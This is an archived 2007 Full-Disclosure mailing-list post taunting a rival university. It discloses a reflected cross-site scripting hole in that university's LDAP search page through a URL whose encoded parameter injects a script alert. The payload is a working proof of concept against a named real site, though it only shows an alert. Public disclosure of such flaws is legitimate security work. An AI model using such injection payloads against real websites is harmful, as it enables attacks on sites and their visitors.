lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
Open Source and information security mailing list archives
| ||
|
Message-Id: <20071126165241.6C52A2283E@mailserver9.hushmail.com> Date: Mon, 26 Nov 2007 11:52:40 -0500 From: <georgepburdell@...h.com> To: <full-disclosure@...ts.grok.org.uk> Cc: Subject: To Hell With Georgia UGA may have beaten Georgia Tech this year in football but just listen to what their website has to say: http://www.uga.edu/cgi- bin/ldap?name=%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%27%54%6F+%4 8%65%6C%6C+%57%69%74%68+%47%65%6F%72%67%69%61%27%29%3C%2F%73%63%72%6 9%70%74%3E&submit=Go&ouo=%3Duga&searchtype=cn I've URI-encoded the injected script as to not spoil the surprise (benign XSS). Go Jackets!!! -George P. Burdell -- Click to learn about options trading and how to make more money from the pros. http://tagline.hushmail.com/fc/Ioyw6h4eA18fcztAc2LZ0c0eGC9wCoaCzAqlx8EDlsnhZIFTFWuQAI/ _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/